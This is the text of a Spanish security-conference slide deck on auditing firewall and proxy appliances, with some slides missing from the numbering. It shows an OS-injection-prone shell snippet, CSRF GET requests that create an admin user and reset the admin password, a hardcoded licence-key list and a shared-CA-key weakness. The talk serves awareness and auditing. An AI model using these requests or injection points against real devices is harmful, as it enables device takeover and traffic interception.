El documento presenta una charla sobre la auditoría de seguridad de dispositivos de red como firewalls y proxies. Se discuten varios ejemplos de vulnerabilidades encontradas en estos dispositivos y se demuestra cómo algunas pueden utilizarse para escalar privilegios y comprometer la red. La presentación concluye instando a no confiar ciegamente en los dispositivos y a revisar periódicamente su configuración y seguridad.
1. CATS: ALL YOUR APPLIANCES ARE
BELONG TO US
NAVAJA NEGRA
Conference
2. Disclaimer
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec non risus
eros. Suspendisse ac quam et augue malesuada venenatis. Fusce
condimentum libero ac tellus sagittis convallis. Nullam ut enim nisl.
Suspendisse tincidunt elit eget turpis consectetur mollis lacinia felis
aliquam. Esta charla es con fines educativos y de
concienciación. Curabitur et libero leo, vel mattis ipsum. Mauris
laoreet nibh ac mauris convallis at lacinia eros rutrum. Donec porttitor
semper neque, eu fringilla mi egestas at. Donec gravida aliquam sem,
sed ornare nisi euismod ut. Etiam sed odio ut nisi egestas rhoncus ut vel
augue. In hac habitasse platea dictumst. Phasellus eros turpis, varius ac
sodales sit amet, lobortis non elit.
3. Dos dementes contra el mundo
Alejandro Nolla Blanco
Threat Intelligence Analyst
Apasionado del networking
@z0mbiehunt3r
Rubén Garrote García
Consultor de seguridad / Pentester
Apasionado del reversing
@boken_
Esta diapositiva está patrocinada por
4. Agenda
Full Disclosure Vs Responsible Disclosure
¿Por qué auditar nuestros appliances?
Situación actual
Demo!
Conclusiones y recomendaciones
5. Pero no toques, ¿por qué tocas?
“El trasto este viene hardenizado de serie”
¿Para qué comprometer un appliance?
Pero eso... será complicado, ¿no?
Yo no estoy comprometido - ¿Cómo lo sabes?
6. Pero no toques, ¿por qué tocas?
¿Estás seguro de que
puedes confiar
ciegamente?
10. Out-of-the-box (in)security
Examination of a certificate chain generated by a Cyberoam DPI device shows that all such
devices share the same CA certificate and hence the same private key. It is therefore
possible to intercept traffic from any victim of a Cyberoam device with any other Cyberoam
device - or to extract the key from the device and import it into other DPI devices, and use
those for interception.
13. WANTED
Fallos Web
Usuarios no documentadoS
Claves SSH
Certificados SSL
Puertas traseras
Escalada de privilegios
Para más información visitar el proyecto Common
Weakness Enumeration (http://cwe.mitre.org)
14.
15. OS Injection
do_addvs()
{
# We are now going to handle a POST which is a real add
# echo "<!-post = $post>"
# vip=&port=&protocol=tcp&Commit=Add+VIP
[…]
grep -v "^%.*%" $f | sed -e "s/%PORT%/$port/" -e "s/%VIP%/
$vip/" -e "s/%PROT%/$protocol/" -e "s/%NAME%/$FFF/"> $VIF
[…]
}
16. Súper C RF (allí donde se le necesite)
Creamos un usuario nuevo
GET /config/password.php?
action=edituser&t=1326400365&username=new_user&pass=new_pass&group=repor
t&type=new&go=Add+New+User HTTP/1.1
Hacemos admin a cualquier usuario
GET /config/password.php?
action=edituser&t=000&username=new_user&pass=new_pass&group=config&uid=4
&go=Edit+User HTTP/1.1
Cambiamos la contraseña a cualquier usuario
GET /config/password.php?
action=edituser&t=1326152517&username=admin&pass=123abc.&uid=0&go=Edit+U
ser HTTP/1.1
17. Tirando la casa por la ventana...
function validate_key($key) {
[...]
$keys_va_r16 = array("CrUC7e3en2cH",
"P4E5RAswaR4c",
"YaYaY5w2ZaPr",
[...]
"w9E4edasuthe",
"drub8spaT7uj");
if (in_array($key, $keys_va_r16)) {
cp($model_va_r16, $model_current);
}
[…]
write_licence(False, 0);
echo "<center><p>Licence activated.</p></center>";
18. ¿Cómo encontrar estos fallos?
Auditoría tipo “caja negra” y/o “caja blanca”
Análisis estático y/o dinámico
Mediante fuzzing
RTFC (Read The Fucking Code)
19. Consecuencias
✗ Bypass de las medidas de protección
✗ Compromiso total del dispositivo
✗ Aumento de la intrusión
✗ Interceptación del tráfico de red
24. Conclusiones
➢ Si auditas tus aplicaciones, ¿por qué no tus
appliances?
➢ ¿Por qué implantar algo que desconocemos?
➢ En todas partes se cumplen plazos de entrega
25. Recomendaciones
✔ Nunca confíes ciegamente en nada
✔ Disminuir la superficie de exposición
✔ Revisar la infraestructura existente
✔ En caso de duda, el entorno es hostil